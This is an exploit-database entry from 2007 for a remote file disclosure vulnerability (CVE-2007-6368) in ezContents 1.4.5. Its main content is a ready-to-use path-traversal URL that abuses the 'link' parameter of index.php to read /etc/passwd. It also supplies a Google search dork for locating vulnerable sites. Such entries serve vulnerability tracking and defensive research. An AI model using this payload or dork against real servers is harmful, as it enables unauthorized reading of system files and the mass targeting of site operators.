ezContents 1.4.5 index.php link Remote File Disclosure Vulnerability

2007-12-05T00:00:00
ID EDB-ID:4694
Type exploitdb
Reporter p4imi0
Modified 2007-12-05T00:00:00

Description

ezContents 1.4.5 (index.php link) Remote File Disclosure Vulnerability. CVE-2007-6368. Webapps exploit for php platform

                                        
                                            --------------------------------------------------------------
ezContents Version 1.4.5 Remote File Disclosure Vulnerability.
--------------------------------------------------------------

download    : http://www.visualshapers.com/
author      : p4imi0
contact     : p4imi0@gmail.com
exploit     : /ezcontents1_4x/index.php?link=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
google dork : inurl:"index.php?link=" Powered by ezContents Version 1.4.5
thanks to   : str0ke, Cr[]w.

# milw0rm.com [2007-12-05]